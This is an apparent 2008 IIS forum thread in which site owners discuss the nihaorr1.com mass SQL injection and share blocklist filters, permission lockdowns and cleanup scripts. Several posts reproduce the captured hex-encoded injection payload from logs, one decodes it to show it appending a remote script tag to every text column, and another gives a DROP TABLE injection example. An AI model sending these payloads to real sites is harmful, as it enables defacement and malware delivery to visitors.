    The example I provided searches for text in the cs-uri-query IIS log file for the wildcard %CAST%, the percent signs are wild cards on both sides.  People can change the text to be %DECLARE% or variations.  I chose CAST because that seemed to be a common term.

    Steve Schofield
    Windows Server MVP - IIS
    http://iislogs.com/steveschofield
    http://www.IISLogs.com
    Log archival solution
    Install, Configure, Forget

  • Rovastar Rovastar

    5469 Posts

    MVP

    Moderator

    Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 26, 2008 09:16 PM|Rovastar|LINK

    I see. CAST is a common term and is used in this attack. I believe another similiar command CONVERT can be used instead as they have similiar funcationality.

    So, I believe, it does not have to be CAST.

    Troubleshoot IIS in style
    https://www.leansentry.com/
  • Rovastar Rovastar

    5469 Posts

    MVP

    Moderator

    Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 26, 2008 09:43 PM|Rovastar|LINK

    Also for those of you that want a more detailed explaination the deeper goings on of this attack.

    See this article. Interesting stuff.

    http://ddanchev.blogspot.com/2008/04/united-nations-serving-malware.html

    and here are more on the attack

    http://isc.sans.org/diary.html?storyid=4331 

    http://www.dynamoo.com/blog/2008/04/nihaorr1com-theres-no-such-thing-as.html

     

    Troubleshoot IIS in style
    https://www.leansentry.com/
  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 26, 2008 10:53 PM|alexhiggins732|LINK

    Hi,

     The use of this script at pointing to nihaorr1.com is only the latest method of attack used by this attacker.  This guy has been hacking at a clients web site for a long time and usually does so through various proxy servers.  For those looking for a tool to view IIS log files, check out this program I have written http://www.alexanderhiggins.com/logfileparser.aspx

    To prevent the attacks I have made done the following:

    1) Open notepad and past the following code.  The code will check the request for a sql injection attack, and if it finds one it sends you an email and redirects the request to an error page.

    <%
    dim str
    dim r
    dim badwords
    str = request.servervariables("QUERY_STRING")

    if verify(str) = false or (request.querystring("preview")="true") then
     Set myMail=CreateObject("CDO.Message")
     myMail.Subject="Sending email with CDO"
     myMail.From="youremailaddress@yourdomain.com"
     myMail.To="mailto:youremailaddress@yourdomain.com"
     
     Dim body
     for each item in request.servervariables
      body = body & item & "=" & request.servervariables(item) & vbcrlf
     next
     'for each item in request.params
      'body = body & item & "=" & request.params(item) & vbcrlf
     'next
     myMail.TextBody="This is a SQL Injection Hack Attempt.  Heres the details.  " & vbcrlf & vbcrlf & body
     if request.querystring("preview")="true" then
      response.write("<pre>" & myMail.textbody & "</pre>")
      set myMail=nothing
     else
      myMail.Send
      set myMail=nothing
      response.redirect("urlscripterror.asp")
     end if
     
     
    end if
      'response.write(verify(str) &"<BR>")
      'response.write(str &"<BR>")
      'response.write(request.servervariables.count)
      'for each item in request.servervariables
      'response.write(item & "=" & request.servervariables(item) & "<BR>")
      'next

    function verify(s)
     
     'convert the querystring to lowercase
     s = lcase(s)

     ' badwords - a list of disallowed keywords in the url
     badwords= "select insert update delete drop -- table alter cast convert exec chr( union"

     ' create an array list of each back word
     r = split(badwords, " ")
     
     ' loop through the bad words and return false if it is present.
     for i =0 to ubound(r)
      if instr(s, r(i)) > 0 then
       
           verify = false 'instr(s, r(i))
       exit function
      end if
     next

     ' If the badword was not found then set verified to = True
     verify=true

    end function
    %>

     

    2) Save the file as urlfilter.asp and upload it to your web site root.

    3) Include the file by pasting the following codeat the very beginning of your asp pages. Note if your site uses includes you can include it in a single include that is shared by all of your pages.

    <!-- #include virtual="/urlfilter.aspx" -->

    From a security perspective, lock down your databases.  Perhaps allow only select permissions for anonymous viewers and have a different sql login and connection string for the backend where database updates are required.

    My issue with monitoring for EXEC commands is by that point the damage is already done. Further, if the hacker is skilled enough they can comprimise your entire server before you even realize they have attacked using the write sql code.  

    Here is the email I received when this attack happened, with certain information replaced of course.

    This is a SQL Injection Hack Attempt.  Heres the details. 

     

    ALL_HTTP=HTTP_CONNECTION:keep-alive

    HTTP_CONTENT_LENGTH:0

    HTTP_CONTENT_TYPE:text/html

    HTTP_ACCEPT:text/html, */*

    HTTP_HOST:www.domainname.com

    HTTP_USER_AGENT:Mozilla/3.0 (compatible; Indy Library)

     

    ALL_RAW=Connection: keep-alive

    Content-Length: 0

    Content-Type: text/html

    Accept: text/html, */*

    Host: www.domainname.com

    User-Agent: Mozilla/3.0 (compatible; Indy Library)

     

    APPL_MD_PATH=/LM/W3SVC/1206399212/Root

    APPL_PHYSICAL_PATH=E:\domainname\web\

    AUTH_PASSWORD=

    AUTH_TYPE=

    AUTH_USER=

    CERT_COOKIE=

    CERT_FLAGS=

    CERT_ISSUER=

    CERT_KEYSIZE=

    CERT_SECRETKEYSIZE=

    CERT_SERIALNUMBER=

    CERT_SERVER_ISSUER=

    CERT_SERVER_SUBJECT=

    CERT_SUBJECT=

    CONTENT_LENGTH=0

    CONTENT_TYPE=text/html

    GATEWAY_INTERFACE=CGI/1.1

    HTTPS=off

    HTTPS_KEYSIZE=

    HTTPS_SECRETKEYSIZE=

    HTTPS_SERVER_ISSUER=

    HTTPS_SERVER_SUBJECT=

    INSTANCE_ID=1206399212

    INSTANCE_META_PATH=/LM/W3SVC/1206399212

    LOCAL_ADDR=xxx.xxx.xxx.xxx

    LOGON_USER=

    PATH_INFO=/attackedpage.asp

    PATH_TRANSLATED=E:\domainname\web\attackedpage.asp

    QUERY_STRING=date=4/17/2008%2011:05:00%20AM';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E006900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);--

    REMOTE_ADDR=219.153.46.28

    REMOTE_HOST=219.153.46.28

    REMOTE_USER=

    REQUEST_METHOD=POST

    SCRIPT_NAME=/lakewood_blueclaws_schedule.asp

    SERVER_NAME=www.domainname.com

    SERVER_PORT=80

    SERVER_PORT_SECURE=0

    SERVER_PROTOCOL=HTTP/1.0

    SERVER_SOFTWARE=Microsoft-IIS/6.0

    URL=/attackedpage.asp

    HTTP_CONNECTION=keep-alive

    HTTP_CONTENT_LENGTH=0

    HTTP_CONTENT_TYPE=text/html

    HTTP_ACCEPT=text/html, */*

    HTTP_HOST=www.domainname.com

    HTTP_USER_AGENT=Mozilla/3.0 (compatible; Indy Library)

    As you can see the attacker simple sent a malformed URL query, which of course is viewable in my IIS logs.

    IIS Directory Security ASP SQL nihaorr1 sql injection aspder clean-up sql injection nihaorr1.com prevent sql injection

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 27, 2008 03:03 AM|dlsfarcrxr|LINK

    I want to preface this comment with the following: I have very minimal experience with IIS and MS SQL. I do, however, have experience with MySQL. This post is not meant as flamebait.

    racekites

    ...

    passedString(0) = "DECLARE"
    passedString(1) = "NVARCHAR"
    passedString(2) = "SET"
    passedString(3) = "CAST"
    passedString(4) = "0x"
    passedString(5) = "("
    passedString(6) = ")"
    passedString(7) = "--"
    passedString(8) = "@"
    passedString(9) = ";"
    passedString(10) = "-"
    passedString(11) = "SELECT"
    passedString(12) = "declare"
    passedString(13) = "set"
    passedString(14) = "cast"
    passedString(15) = "nvarchar"

    ...

    Unless you are dealing with a database where you know what every single value is going to be, won't this result in false positives? For example, if a user enters a value of "b0x", this will match the "0x" in the list of bad words. Additionally, aren't there many ways to bypass a blacklist such as this (CAST, etc.)?

    Doesn't MS SQL Server have a method to escape certain characters? When I create a program that uses a MySQL database, I have two functions - EscapeMySQL and UnEscapeMySQL. When I have data from a user, it passes through EscapeMySQL before being stored in the database. When I read a value from the database, it passes through UnEscapeMySQL before being displayed. By escaping certain characters (backslash, quote, double quote, linefeed, carriage return, tab, etc.), I don't have to worry even if "DROP DATABASE" is in a string.

    --
    Dave

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 27, 2008 05:22 PM|fox1977|LINK

    Hi folks,

    Just a quick question,apologies if it sounds a bit stupid.  Are there any microsoft patches available to prevent this happening (either on SQL or IIS) or should any protective measures be taken at the application level.

    I've just spend the weekend patching web servers any way!

    Thanks
     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 27, 2008 06:19 PM|alexhiggins732|LINK

    Yes these will send up some false positives 

    passedString(0) = "DECLARE"
    passedString(1) = "NVARCHAR"
    passedString(2) = "SET"
    passedString(3) = "CAST"
    passedString(4) = "0x"
    passedString(5) = "("
    passedString(6) = ")"
    passedString(7) = "--"
    passedString(8) = "@"
    passedString(9) = ";"
    passedString(10) = "-"
    passedString(11) = "SELECT"
    passedString(12) = "declare"
    passedString(13) = "set"
    passedString(14) = "cast"
    passedString(15) = "nvarchar"

    Thats why in my post I have limited that blacklisted words to

     badwords= "select insert update delete drop -- table alter cast convert exec chr( union"

     Or

    passedString(0)= "select"
    passedString(1)= "insert"
    passedString(2)= "update"
    passedString(3)= "delete"
    passedString(4)= "drop"
    passedString(5)= "--"
    passedString(6)= "table"
    passedString(7)= "alter"
    passedString(8)= "cast"
    passedString(9)= "convert"
    passedString(10)= "exec"
    passedString(11) = "chr("
    passedString(12) = "union"

    Additionally, once a request is filtered, I recieve an email so I can review and check for a false positive and adjust my code accordingly.

    As far MS SQL having function to prevent this they do, and its called stored procedures.  The Problem is that most old school asp programming uses free text queries which the hackers are taking advantage of here.  If the code where to use stored procedures this wouldn't be an issue.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 28, 2008 02:04 AM|yogorilla|LINK

    Thanks for all the info here guys, we were hit last week and this thread saved me a lot of time.

     On the subject of stored procs, I'm not sure that they will automatically solve the problem. I have one simple stored proc called from a form that could still provide a vehicle for executing the malicious code, validating the query or the individual parameters would still appear to be the best thing to do.

     

  • naziml naziml

    74 Posts

    Microsoft

    Re: Anyone know about www.nihaorr1.com/1.js?

    Apr 28, 2008 04:17 PM|naziml|LINK

    I have put up a generic ASP SQL validation script on my blog post here.

    Hope this helps.

    ------------------------------------------------------ 

    Nazim

    IIS Security

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 03, 2008 06:09 PM|alexhiggins732|LINK

    How would stored procedures be vulnerable?  The paramaters are converted to a string and are not executed as t-sql.  Try it out, I think you are confused.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 07, 2008 04:21 AM|bjornen|LINK

    Thanks a lot alexhiggins732 

    I added this script to the website and it seems to work very well already. Only few hours after I set it up, he tried again. This time he was not able to destroy any data in the database. I got the email with the below information. Is there at all anything that can be done to purue this guy?

    ALL_HTTP=HTTP_ACCEPT:text/html, */*

    HTTP_CONNECTION:keep-alive

    HTTP_HOST:www.mydomain.com

    HTTP_USER_AGENT:Mozilla/3.0 (compatible; Indy Library) HTTP_CONTENT_LENGTH:0 HTTP_CONTENT_TYPE:text/html

     

    ALL_RAW=Accept: text/html, */*

    Connection: keep-alive

    Host: www.mydomain.com

    User-Agent: Mozilla/3.0 (compatible; Indy Library)

    Content-Length: 0

    Content-Type: text/html

     

    APPL_MD_PATH=/LM/W3SVC/24/Root

    APPL_PHYSICAL_PATH=E:\www\site\

    AUTH_PASSWORD=

    AUTH_TYPE=

    AUTH_USER=

    CERT_COOKIE=

    CERT_FLAGS=

    CERT_ISSUER=

    CERT_KEYSIZE=

    CERT_SECRETKEYSIZE=

    CERT_SERIALNUMBER=

    CERT_SERVER_ISSUER=

    CERT_SERVER_SUBJECT=

    CERT_SUBJECT=

    CONTENT_LENGTH=0

    CONTENT_TYPE=text/html

    GATEWAY_INTERFACE=CGI/1.1

    HTTPS=off

    HTTPS_KEYSIZE=

    HTTPS_SECRETKEYSIZE=

    HTTPS_SERVER_ISSUER=

    HTTPS_SERVER_SUBJECT=

    INSTANCE_ID=24

    INSTANCE_META_PATH=/LM/W3SVC/24

    LOCAL_ADDR=0.0.0.0

    LOGON_USER=

    PATH_INFO=/default.asp

    PATH_TRANSLATED=E:\www\file\default.asp

    QUERY_STRING=Folder=469&CompanyDirectory=1440&CompanyName=Bon+Bon+Guesthouse';DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E006900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);--

    REMOTE_ADDR=60.169.3.130

    REMOTE_HOST=60.169.3.130

    REMOTE_USER=

    REQUEST_METHOD=POST

    SCRIPT_NAME=/default.asp

    SERVER_NAME=www.mydomain.com

    SERVER_PORT=80

    SERVER_PORT_SECURE=0

    SERVER_PROTOCOL=HTTP/1.0

    SERVER_SOFTWARE=Microsoft-IIS/5.0

    URL=/default.asp

    HTTP_ACCEPT=text/html, */*

    HTTP_CONNECTION=keep-alive

    HTTP_HOST=www.mydomain.com

    HTTP_USER_AGENT=Mozilla/3.0 (compatible; Indy Library) HTTP_CONTENT_LENGTH=0 HTTP_CONTENT_TYPE=text/html

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 07, 2008 04:37 AM|bjornen|LINK

    By the way. I see he seems to be from China, but I assume this is not his real IP.

    IP: Country: Region: City: Isp:
    60.169.3.130 CHINA - - CHINANET ANHUI PROVINCE NETWORK

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 07, 2008 05:25 PM|greenlit_design|LINK

    Thanks for posting this. It did help. I just wanted to contribute also to the group. We got SQL injected last night by this and this is how i fixed it.

    1) First to prevent script from executing or any further issues:

    deny select on sysobjects to sql_login_of_your_app
    deny select on syscomments  to ql_login_of_your_app
    deny select on syscolumns  to ql_login_of_your_app
    deny select on systypes  to ql_login_of_your_app

    The script won't even get access to the sys tables anymore (you can add more but these are the minimum).


    2) use what the Hacker used.

    select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u'
    and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)

    That query tells who what was infected.
    With a night without sleep and few hours later, here is the script that will go thru all the tables / column and remove that string.

    Hope this help. Don't hesitate if you have questions.
    Thanks




    Use DBname --- (your actual DB infected)
    go
     
    -- (if needed) drop table tmp_tableInfected
    create table tmp_tableInfected
          (t varchar(100),
                c varchar(100),
          total int)
     
    -- (if needed) truncate table tmp_tableInfected
     
    Declare @sqlInjectString varchar(200)

    --- here you specify the sql inject string. They used 2 different ones in our case
    Set @sqlInjectString = '<script src=http://www.nihaorr1.com/1.js></script>'


     
    DECLARE @T varchar(255),
    @C varchar(255)
     
    set nocount on
     
    DECLARE Table_Cursor
    CURSOR FOR
    select top 10    a.name,
    b.name from sysobjects a,syscolumns b
    where a.id=b.id and a.xtype='u'
    and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
    and a.name not in ('t_article', 'tbl_reviews', 'tbl_articles', 'tbl_reviews_BK','tbl_spotlights_BK')
    order by a.name, b.name
     
    OPEN Table_Cursor
    FETCH NEXT FROM Table_Cursor
    INTO @T,@C
    WHILE(@@FETCH_STATUS=0)
    BEGIN
     
          --print ('insert into tmp_tableInfected select '''
          --+  @T +  ''','''
          --+  @C + ''', count(*)  FROM [' + @T +'] (nolock) where ['
          --+ @C  + '] LIKE ''%'
          --+ @sqlInjectString + '%'' having count(*) > 0')
     
          Exec ('insert into tmp_tableInfected select '''
          +  @T +  ''','''
          +  @C + ''', count(*)  FROM [' + @T +'] (nolock) where ['
          + @C  + '] LIKE ''%'
          + @sqlInjectString + '%'' having count(*) > 0')
     
    FETCH NEXT FROM Table_Cursor INTO @T,@C
    END CLOSE Table_Cursor
    DEALLOCATE Table_Cursor
     
     
    --DECLARE @T varchar(255),
    --@C varchar(255)
     
    DECLARE fixSQLInject_Cursor
    CURSOR FOR
    select t,c from tmp_tableInfected
     
    OPEN fixSQLInject_Cursor
    FETCH NEXT FROM fixSQLInject_Cursor INTO @T,@C
    WHILE(@@FETCH_STATUS=0)
    BEGIN
     
          Print 'update ' + @t + ' set ' + @c + ' = replace('+ @c + ',''' + @sqlInjectString + ''', '''')'
          --- exec ('update ' + @t + ' set ' + @c + ' = replace('+ @c + ',''' + @sqlInjectString + ''', '''')')
     
    FETCH NEXT FROM fixSQLInject_Cursor INTO @T,@C
    END CLOSE fixSQLInject_Cursor
    DEALLOCATE fixSQLInject_Cursor
     
    --select t,c,total from tmp_tableInfected
     
     
     
    drop table tmp_tableInfected
     


     

     

     

     

     

     

    powlette

    Long story short, it's definitely SQL injection. here's the offending url:

    orderitem.asp?IT=GM-204;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C004000 4300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F0072002000430055 00520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D00200073007900 73006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069 006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F0072002000 62002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D0031 0036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00 200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C00450028004000400046004500540043 0048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B00 27005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C 005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E00 6900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E0045 00580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E0044002000 43004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F00430075 00720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);--

    decoding that binary data which is cast to a varchar yields this:

    DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name'b.name from sysobjects a'syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T'@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar'['+@C+']))+''<script src=nihaorr1.com/1.js></script>''')FETCH NEXT FROM Table_Cursor INTO @T'@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor

    And there you have it. It finds all text columns in the database and adds itself to it.

     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 08, 2008 12:49 AM|eftennis|LINK

    Your idea of denying select access to the sys objects seems to make the most sense of any ideas I have read about sql injectors.   That would appear to be a foolproof way of at least stopping the current attackers. 

     Has this worked for you?

    I tried to go in and do this, but, my sql login account does not appear to have permissions (I use a share sql server database on my hosting company).

    If I ask my hosting company to do the DENY is it as simple as the command you included in your post?

     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 08, 2008 02:06 AM|greenlit_design|LINK

    eftennis

    Your idea of denying select access to the sys objects seems to make the most sense of any ideas I have read about sql injectors.   That would appear to be a foolproof way of at least stopping the current attackers. 

     Has this worked for you?

    I tried to go in and do this, but, my sql login account does not appear to have permissions (I use a share sql server database on my hosting company).

    If I ask my hosting company to do the DENY is it as simple as the command you included in your post?

     

    Yes. Deny select on .... to sql_login You need to have SysAdmin privileges to do this. Your hosting company should actually do this. I don't know if they have a DBA. I assume it will work for us. I did a test login as the sql_login used for the app and try to run the command of the script and i got the "permission denied" error. Let me know if you have any questions. Thanks
  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 08, 2008 02:26 AM|alexhiggins732|LINK

    bjornen

    Thanks a lot alexhiggins732 

    I added this script to the website and it seems to work very well already. Only few hours after I set it up, he tried again. This time he was not able to destroy any data in the database. I got the email with the below information. Is there at all anything that can be done to purue this guy?

     

    No Problem, Like I said I have had this in place for months and I know that it is working.  I would also suggest you download my IIS Log File Viewer and checkout the log files in your web server.  Sql Injection hack attempts are usually easy to spot becuase the query strings are so long.

     

    As far as some of these ideas here, such as deny access to sys tables, I am sure they will work to an extent, but in a professional environment you may be dealing with hundreds or even thousands of databases and/or users and all it really does is stops a hacker from discovering the names of database, tables and columns in your database.  If your application is vulnerable to these types of attacks, you need to intercept them before they hit the database or a hacker will still be able to gain access to sensitive data like usernames, passwords and credit card information.

     

    As far as the post that searchs cookies, form values, and query strings, I initially went that route but saw to many false positives, especially in the form values. I would recommend filtering form values in another manner.

     

    <%

     ' Usage <!-- #include virtual="stringfilters.asp"-->

    ' For Each Item In Request.Form
    '    Request.Form(Item) = getUserInput(Request.Form(Item), -1)
    ' Next
    '
    '  alternately, if you know a string should be only a certing length
    ' specify the length -- for a first name -- getUserInput(Request.Form("FirstName"), 50)

    Dim  pFilteringLevel
    pFilteringLevel=0

    function
    getLoginField(input,stringLength)

    ' to filter login fields
    dim regEx
    Set regEx = New RegExp
    getLoginField = left(trim(input),stringLength)
    regEx.Pattern =
    "([^-_A-Za-z0-9@.])"
    regEx.IgnoreCase = True
    regEx.Global = True
    getLoginField = regEx.Replace(getLoginField,
    "")
    Set regEx = nothing

    end functionfunction getUserInput(input, stringLength)

    dim newString, regEx
    Set regEx = New RegExp
    ' only specified length

    if not stringLength = -1 then
        newString = left(trim(input),stringLength)
    else
        newString=Input
    end if

    if pFilteringLevel=1 then
        regEx.Pattern =
    "([^A-Za-z0-9@=:/*|' _-]+.%)"
        regEx.IgnoreCase = True
        regEx.Global = True
        newString = regEx.Replace(newString,
    "")
        Set regEx = nothing

        newString = replace(newString,"--","")
        newString = replace(newString,
    ";","")
    end if

    if pFilteringLevel=2 then
        newString = replace(newString,
    "--","")
       
    newString = replace(newString,";","&#59;")
       
    newString = replace(newString,"=","&#61;")
        newString = replace(newString,
    "(","&#40;")
        newString = replace(newString,
    ")","&#41;")
        newString = replace(newString,
    "'","&#39;")
        newString = replace(newString,
    """","&#34;")
    end
    if

    if pFilteringLevel=3 then
        newString = replace(newString,
    "'","&#39;")
        newString = replace(newString,
    """","&#34;")
    end
    if

    getUserInput = newString

    end
    functionfunction getUserInputL(input,stringLength)

    ' light filtering

    dim tempStr
    tempStr = left(input,stringLength)
    tempStr = replace(tempStr,
    "--","")
    tempStr = replace(tempStr,
    ";","&#59;")
    tempStr = replace(tempStr,
    "=","&#61;")
    tempStr = replace(tempStr,
    "(","&#40;")
    tempStr = replace(tempStr,
    ")","&#41;")
    tempStr = replace(tempStr,
    "CHAR","&#67;&#72;&#65;&#82;")
    tempStr = replace(tempStr,
    "'","&#39;")
    tempStr = replace(tempStr,
    """","&#34;")
    getUserInputL = tempStr

    end function

    function formatForDb(input)

    dim tempStr
    tempStr=input
    if isNull(tempStr)=false then
        ' replace to avoid DB errors
        tempStr = replace(tempStr,"'","''")
        tempStr = replace(tempStr,
    "''''","''")
        tempStr = replace(tempStr,
    "''''''","''")
        tempStr = replace(tempStr,
    "''''''''","''")
        tempStr = replace(tempStr,
    """","""")

    end if

    formatForDb = tempStr

    end function

    function formatNumberForDb(input)     formatNumberForDb=replace(input,",",".")

    end function

    %>

    asp code to filter sql injection iis log file parser iis log file viewer Sql injection filter

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 09, 2008 05:53 AM|Simontasker|LINK

    Morning everyone,

    Has any one managed to replicate the way this virus attacks the system?I’m curious because i've now set up a test server and i’m working on testing different software packages to determine if the are viable to help protect our servers. I know that simply copy and pasting the virus code into the address bar wont work due to the string being far too long so if anyone has found a way of replicating the attack would you please Private Message me or post here.Also anyone tried to block the HTTP_USER_AGENT=Mozilla/3.0 (compatible; Indy Library) as this seems to be the major distributor of the virus... 

     

    Thanks Simon

     

    asp code to filter sql injectioniis log file parseriis log file viewerSql injection filter

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 10, 2008 06:34 AM|neilredfern|LINK

     Hello,

     We were also hit by this attack although I am puzzled to here there were able to inject the SQL into our stored procedure.  Now I know how SQL injection works and I have been able to verify that the page was venerable to this sort of attack.

    The puzzler for me is that there managed to injected arround 2000 charactors into a stored procedure via a parameter that is declared as a varchar(10).  Now in all my tests any content of the parameter over 10 characters is truncated, so how is it there are able to run the code???

     

    Thanks

     

    Neil
     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 10, 2008 05:03 PM|alexhiggins732|LINK

    Please post your  code.  To my knowledge, this can be done in a stored procedure.   You must have an issue in the code that calls your stored procedure.

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 10, 2008 07:02 PM|steve schofield|LINK

    Here is a link on detecting a site being exposed. 

    http://www.securityfocus.com/infocus/1768

    I'm checking to see if Nessus (http://www.nessus.org/nessus/) can detect an exposed site.  This is the ultimate tool for detecting security exploits. If they support it, I'll post instructions.

    Steve Schofield
    Windows Server MVP - IIS
    http://iislogs.com/steveschofield
    http://www.IISLogs.com
    Log archival solution
    Install, Configure, Forget

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 12, 2008 09:15 AM|DavidReabow|LINK

    Hi Neil

    Stored procedures can help but in this case you have to worry about how the stored procedure and parameters are "passed" to SQL server.

    Lets say you had the following URL on your site:

     HTTP://www.yoursite.com/ShowProduct.ASP?ProductID=1

    You may not check the ProductID for "corrupt" data and simply build a string that includes the SP name and parameters; e.g.:

    strCommand = 'EXEC usp_GetProductDetail ' & ProductID

    If you were expecting a value of say "1" to be passed but as in the case of this injection attack the attacker calls this URL:

      HTTP://www.yoursite.com/ShowProduct.ASP?ProductID=1%20DROP%20TABLE%tblProducts

    Your strCommand variable would now look something like this:

    'EXEC usp_GetProductDetail 1 DROP TABLE tblProducts'

    This is a simplified example but if you happened to have a table called tblProducts and if the user account executing this code had sufficient rights, then your table could be deleted.

    You can do all the checks previously mentioned on this thread and many will help improve your security.

    Another thing you should do is use Parameter objects when executing SQL statements. I'm not going to go into detail as there should be lots online for whichever development language you're using.

    A good place to start looking at this could be here:

    http://msdn.microsoft.com/en-us/library/ms681010(VS.85).aspx

     

    I hope this helps

     David

     

     

     

     

     

     

     

  • Re: Anyone know about www.nihaorr1.com/1.js?

    May 12, 2008 12:14 PM|neilredfern|LINK

    David,

    Thanks for this its a long time since I've done asp I'm used to asp.net where we always use parameters.  You are correct you do just build up a string like:

    strCommand = 'EXEC usp_GetProductDetail ' & ProductID

    And it make sense that there are using the fact that we are not parsing out ' etc but as the actually parameter of the sp is a varchar(10) I would expect an data been passed to though this parameter to be trimmed down to this size.  At least thats how it happens though SQL Managment Studio although maybe asp is different.

    I will look at the parameters and I have implement the script to check for SQL injection values in the querystring and form collection earlier in the thread which should keep them out.

     

    Thanks

     

